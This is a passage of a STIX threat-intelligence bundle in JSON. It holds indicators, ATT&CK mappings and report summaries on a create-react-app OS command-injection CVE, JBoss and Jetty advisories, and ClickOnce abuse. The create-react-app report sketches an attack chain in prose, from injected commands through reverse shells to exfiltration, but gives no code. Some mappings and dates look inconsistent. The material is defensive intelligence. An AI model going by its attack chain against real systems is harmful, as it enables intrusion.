      "name": "url: https://github.com/react/create-react-app/",
      "pattern": "[url:value = 'https://github.com/react/create-react-app/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:23:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33d2ca04-adf7-52b8-9a63-1377513389f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "indicator--1bb07ab6-7a35-5b9d-bdc6-aef17f915159"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4cafae96-4ef6-5cda-8da4-55e391a1b16d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/react/create-react-app/issues/17269",
      "pattern": "[url:value = 'https://github.com/react/create-react-app/issues/17269']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:23:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--933651af-5364-5053-9c5d-bf814d8dc663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "indicator--4cafae96-4ef6-5cda-8da4-55e391a1b16d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e7310661-37fe-539e-b212-07b9d8c0b653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14802",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14802']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:23:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b75102ff-eedf-5e2e-abba-1c9d62f93837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "indicator--e7310661-37fe-539e-b212-07b9d8c0b653"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1eea7cd7-27d3-5b0c-9fc2-cd09174ff183",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/850857",
      "pattern": "[url:value = 'https://vuldb.com/submit/850857']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:23:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70351dbf-642e-5a78-b253-ab820be8bab4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "indicator--1eea7cd7-27d3-5b0c-9fc2-cd09174ff183"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b9afaf30-bcb3-5795-ab82-d4df436341de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376396",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376396']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:23:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e8308f4-83bd-54c3-acf3-cfcce83dfff9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "indicator--b9afaf30-bcb3-5795-ab82-d4df436341de"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b20bbe90-0a9e-541d-b586-c499fdbc7638",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376396/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376396/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:23:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--759b20dc-b9e7-52a7-81fe-4327cc68f7e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "indicator--b20bbe90-0a9e-541d-b586-c499fdbc7638"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1f87c64a-997b-59d8-83b4-9daa62b18589",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4fd28c6f-e982-5504-9a20-05e981d10115",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7aa00750-02f2-5dbe-86db-74986364add3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14802: Remote OS Command Injection in React Create React App",
      "description": "## Overview\n\nA significant OS command injection vulnerability, tracked as CVE-2026-14802, has been identified in `react create-react-app` versions up to 5.0.1. This flaw specifically impacts macOS systems running development environments utilizing the `react-dev-utils` component, particularly within the `startBrowserProcess` function found in `openBrowser.js`. The vulnerability allows for remote exploitation, enabling an unauthenticated attacker to inject and execute arbitrary operating system commands. An exploit for this vulnerability is now publicly available, increasing the risk of widespread attacks against exposed development instances. This vulnerability was initially reported via an issue, but the project maintainers have not yet responded.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies a `create-react-app` development server, version 5.0.1 or earlier, running on a macOS machine and exposed to the network, often due to misconfiguration or lack of proper network segmentation.\n2.  **Vulnerability Identification**: The attacker determines that the exposed `create-react-app` instance is vulnerable to CVE-2026-14802, specifically targeting the `startBrowserProcess` function within the `react-dev-utils` component.\n3.  **Command Injection**: The attacker crafts and sends a specially malicious request to the `create-react-app` development server, embedding OS commands within the input intended for the `startBrowserProcess` function in `openBrowser.js`.\n4.  **OS Command Execution**: The vulnerable `startBrowserProcess` function processes the unsanitized input, leading to the execution of the injected OS commands with the privileges of the running `create-react-app` process on the macOS system.\n5.  **Payload Delivery and Persistence**: The executed commands can then download and launch additional malicious payloads, such as reverse shells, infostealers, or ransomware, and establish persistence mechanisms on the compromised developer workstation.\n6.  **Lateral Movement and Data Exfiltration**: With control over the developer's machine, the attacker can move laterally within the network, access source code repositories, exfiltrate sensitive intellectual property, or steal credentials.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14802 can lead to severe consequences for organizations. Attackers gaining control over a developer's workstation can compromise sensitive intellectual property, such as proprietary source code, design documents, and API keys. This can lead to data breaches, supply chain attacks if malicious code is injected into software projects, and unauthorized access to internal systems. The remote and unauthenticated nature of the vulnerability, coupled with the public availability of exploit code, increases the likelihood of rapid and widespread exploitation if development environments are not adequately secured.\n\n## Recommendation\n\n*   **Patch `create-react-app`**: Immediately update `create-react-app` to a version beyond 5.0.1 to remediate CVE-2026-14802.\n*   **Isolate Development Environments**: Ensure `create-react-app` development servers and other development tools are not exposed to untrusted networks and are properly segmented from production environments.\n*   **Implement Endpoint Detection \u0026 Response (EDR)**: Deploy EDR solutions on all macOS developer workstations to monitor for suspicious process creation and network connections that may indicate exploitation.\n*   **Monitor for Public Exploits**: Actively monitor public sources, including the references listed in this brief, for new exploit details or proof-of-concepts related to CVE-2026-14802.\n",
      "published": "2026-07-06T08:23:22Z",
      "labels": [
        "vulnerability",
        "command-injection",
        "macos",
        "web-application"
      ],
      "object_refs": [
        "indicator--1bb07ab6-7a35-5b9d-bdc6-aef17f915159",
        "indicator--4cafae96-4ef6-5cda-8da4-55e391a1b16d",
        "indicator--e7310661-37fe-539e-b212-07b9d8c0b653",
        "indicator--1eea7cd7-27d3-5b0c-9fc2-cd09174ff183",
        "indicator--b9afaf30-bcb3-5795-ab82-d4df436341de",
        "indicator--b20bbe90-0a9e-541d-b586-c499fdbc7638",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14802"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/react/create-react-app/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/react/create-react-app/issues/17269"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14802"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/850857"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376396"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376396/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6a71d20-6031-5ed1-950e-9e18cfea02da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba35f025-8614-5c7d-b5dd-4a78008f9ae8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e13ebd1-af03-5c94-8698-0af3b3090c87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba35f025-8614-5c7d-b5dd-4a78008f9ae8",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32bd837c-77e0-56ba-a069-cb7ba5a4f15a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba35f025-8614-5c7d-b5dd-4a78008f9ae8",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6971823e-b64f-593d-835f-3ab40aac62d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba35f025-8614-5c7d-b5dd-4a78008f9ae8",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--087e8b3f-9307-5850-893e-714c52036e7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba35f025-8614-5c7d-b5dd-4a78008f9ae8",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ba35f025-8614-5c7d-b5dd-4a78008f9ae8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Red Hat JBoss Enterprise Application Platform: Multiple Vulnerabilities",
      "description": "## Overview\n\nA remote, unauthenticated attacker can exploit multiple vulnerabilities in Red Hat JBoss Enterprise Application Platform (EAP) to achieve various malicious outcomes. These vulnerabilities, detailed in a BSI (Cert-Bund) advisory (WID-SEC-2023-0239) published on 2026-07-06, could lead to arbitrary code execution, cross-site scripting (XSS) attacks, sensitive information disclosure, denial of service (DoS) conditions, or the bypass of existing security mechanisms. The unauthenticated and remote nature of these vulnerabilities means they are accessible to a broad range of attackers, increasing the urgency of patching and highlighting the critical need for organizations utilizing JBoss EAP to apply security updates immediately to mitigate significant risks. These flaws affect various components within the JBoss EAP, potentially allowing for full system compromise, unauthorized data access, and disruption of critical business services.\n\n## Impact\n\nThe successful exploitation of these vulnerabilities could lead to severe consequences for affected organizations. Arbitrary code execution might result in complete control over the compromised JBoss EAP server, allowing attackers to deploy malware, exfiltrate sensitive data, or establish persistence within the network. Cross-site scripting vulnerabilities could enable session hijacking or credential theft from legitimate users, impacting user data integrity and confidentiality. Information disclosure could expose proprietary business data, customer details, or internal system configurations, leading to compliance violations and reputational damage. Denial of service attacks can disrupt critical applications and services, leading to significant operational downtime and financial losses. The ability to bypass security mechanisms further exacerbates these risks, making the platform vulnerable to subsequent attacks. Given the broad range of potential impacts, organizations must prioritize remediation to prevent significant operational and reputational damage.\n\n## Recommendation\n\n*   Apply all available security updates and patches for Red Hat JBoss Enterprise Application Platform immediately, as advised by Red Hat and BSI (WID-SEC-2023-0239).\n",
      "published": "2026-07-06T08:21:07Z",
      "labels": [
        "vulnerability",
        "rce",
        "xss",
        "dos",
        "information-disclosure",
        "red-hat",
        "jboss",
        "enterprise-application-platform",
        "server-side"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0239"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b6f6045f-33d9-5d49-b71a-1092571db6bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f157e2d5-3333-53ab-8709-eeb3e0b7324d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--75f88e9d-bd8e-5d9b-8564-efbfc29883c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f157e2d5-3333-53ab-8709-eeb3e0b7324d",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f157e2d5-3333-53ab-8709-eeb3e0b7324d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Eclipse Jetty: Multiple Vulnerabilities Including Arbitrary Code Execution",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has published an advisory detailing multiple vulnerabilities in Eclipse Jetty, a widely used open-source HTTP server and servlet container. These vulnerabilities, which are still without assigned CVEs as of July 2026, can be exploited by a remote, authenticated attacker. Successful exploitation could lead to arbitrary code execution, allowing an attacker to run malicious commands on the underlying system, bypass existing security mechanisms to gain further access or persist, or conduct HTTP cache poisoning attacks. The lack of specific CVEs means that organizations must actively monitor vendor advisories for Eclipse Jetty for patch availability. This impacts organizations using vulnerable versions of Jetty across various operating systems (Linux, Windows, macOS), making it critical for defenders to apply updates promptly and enhance monitoring for suspicious activity on these internet-facing or internal applications.\n\n## Attack Chain\n\n[The source content does not describe a concrete, step-by-step attack chain, but rather lists potential outcomes of exploiting vulnerabilities. Therefore, a specific attack chain cannot be constructed.]\n\n## Impact\n\nIf exploited, these vulnerabilities could lead to severe consequences. Arbitrary code execution grants the attacker full control over the compromised Jetty instance and potentially the underlying server, enabling data exfiltration, further network compromise, or deployment of additional malware. Bypassing security measures could allow an attacker to escalate privileges or access sensitive information protected by Jetty's authentication or authorization mechanisms. HTTP cache poisoning could lead to users receiving malicious or incorrect content from cached responses, enabling phishing, defacement, or other client-side attacks, potentially affecting a large number of users interacting with the application.\n\n## Recommendation\n\n*   Immediately review all Eclipse Jetty instances within your environment and apply available patches as soon as they are released to address these vulnerabilities.\n*   Enable and review comprehensive HTTP access logs and application-specific logs for all Eclipse Jetty deployments, focusing on unusual request patterns or unexpected command execution originating from or targeting Jetty processes.\n*   Implement strong authentication policies and monitor authentication logs for Eclipse Jetty to detect and prevent unauthorized access attempts, as the vulnerabilities require an authenticated attacker.\n",
      "published": "2026-07-06T08:19:51Z",
      "labels": [
        "vulnerability",
        "webserver",
        "RCE",
        "authentication-bypass",
        "cache-poisoning",
        "eclipse-jetty"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-2359"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--649ce53f-6479-50a9-8f53-d5264ccf1e9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fd4aedfb-c2c7-5559-ae66-fd0485a5933e",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fd4aedfb-c2c7-5559-ae66-fd0485a5933e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology: Part 1 - Inner Workings and Security Implications",
      "description": "## Overview\n\nCrowdStrike has observed a new abuse of Microsoft's ClickOnce technology, a deployment framework designed to simplify the distribution and installation of .NET applications. While intended for legitimate software distribution, ClickOnce's features — such as minimal user interaction, no administrative privileges requirement, and self-updating capabilities — make it an attractive vector for threat actors. This Part 1 brief details the internal mechanisms of ClickOnce, from application publishing to endpoint installation, laying the groundwork for understanding its security implications. Attackers can leverage these inherent design choices to spread malware, gain initial access, execute malicious payloads, and potentially maintain persistence on compromised Windows systems. This research serves as a foundational analysis before diving into specific weaponization methods in a subsequent Part 2.\n\n## Attack Chain\n\nThis brief (Part 1) focuses on the internal workings of the ClickOnce technology and its legitimate deployment journey rather than a specific observed attack chain. It describes the technical foundation that threat actors could exploit, with specific abuse scenarios and weaponization methods expected to be detailed in a subsequent publication (Part 2). Therefore, a concrete step-by-step attack chain of observed malicious activity is not provided in this document.\n\n## Impact\n\nThe abuse of ClickOnce technology facilitates the straightforward deployment of malicious applications, enabling threat actors to gain initial access and execute arbitrary code on target systems. Should an attack succeed, victims face potential data exfiltration, system compromise, and the installation of additional malware such as ransomware or espionage tools. The ability to install applications with minimal user interaction and without elevated privileges lowers the barrier for attackers, making a wider range of users vulnerable. While no specific victim counts or sectors are detailed in this part of the analysis, the widespread nature of Windows systems makes this a broad potential threat.\n\n## Recommendation\n\n*   Enable comprehensive endpoint logging, specifically for process creation events related to ClickOnce deployment, to detect unusual activity.\n*   Monitor for the creation or execution of `.application` files (ClickOnce deployment manifests) in unexpected user directories or network shares, as described in the brief.\n*   Implement application whitelisting policies to restrict the execution of unsigned or untrusted ClickOnce applications.\n*   Educate users on the risks associated with executing applications from untrusted sources, even those presented through a seemingly legitimate \"one-click\" installation process that leverages the ClickOnce technology.\n",
      "published": "2026-07-07T12:51:44Z",
      "labels": [
        "windows",
        "microsoft",
        "clickonce",
        "initial-access",
        "execution",
        "persistence"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a5f065dc-d3c4-5cde-a4f0-5e24a32b96e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--27435279-2a16-5510-8f65-efcc976a153a",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--730f45b8-f9f9-54be-884c-85d79a6aec28",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--27435279-2a16-5510-8f65-efcc976a153a",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--27435279-2a16-5510-8f65-efcc976a153a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 1: The Inner Workings of ClickOnce Application Deployment",
      "description": "## Overview\n\nMicrosoft's ClickOnce technology, designed for streamlined application deployment, allows developers to package and distribute applications that users can run, install, and update with minimal interaction and without requiring administrative privileges. While intended to simplify software distribution for legitimate purposes, this user-friendly approach inherently presents a significant security risk by providing threat actors with a facile method for spreading malware. This brief, the first in a two-part series, focuses on dissecting the underlying mechanics of ClickOnce. It delves into the entire deployment lifecycle, from an application's initial publication using tools like Visual Studio to its final installation and execution on an end-user's endpoint. Understanding these internal workings is crucial for defenders to anticipate and mitigate future abuses, which will be further explored in Part 2.\n\n## Impact\n\nThe inherent design of ClickOnce, facilitating one-click installation without elevated permissions, means that if exploited by threat actors, it can significantly ease the distribution and execution of malware. This method bypasses traditional installation hurdles, potentially leading to widespread infection across an organization's endpoints with minimal user friction. The impact would include unauthorized access, data exfiltration, system compromise, and the establishment of persistence mechanisms by malicious applications discreetly deployed via this technology.\n\n## Recommendation\n\n*   Educate users on the risks associated with installing software from untrusted sources, particularly those leveraging \"one-click\" installation methods, as described for ClickOnce technology.\n*   Implement application control policies (e.g., AppLocker, WDAC) to restrict the execution of unsigned or untrusted ClickOnce applications, specifically targeting the deployment manifests (`.application` files) and associated executables.\n*   Enable comprehensive endpoint detection and response (EDR) logging for process creation and network connections on Windows machines, as this telemetry is crucial for detecting suspicious ClickOnce activity.\n*   Regularly review and audit security configurations related to Microsoft application deployment technologies to ensure they are hardened against known abuse vectors.\n*   Stay informed on Part 2 of CrowdStrike's research for specific detection strategies and indicators of compromise related to ClickOnce abuse.\n",
      "published": "2026-07-06T07:46:13Z",
      "labels": [
        "clickonce",
        "application-deployment",
        "microsoft",
        "windows",
        "potential-abuse"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4167bfdf-3237-5b6a-b1b6-3f824db66200",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0275f184-83d2-5de6-8027-69f453a8f259",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02fd0f62-d347-5628-97a7-6be946fc8ed9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0275f184-83d2-5de6-8027-69f453a8f259",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0275f184-83d2-5de6-8027-69f453a8f259",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
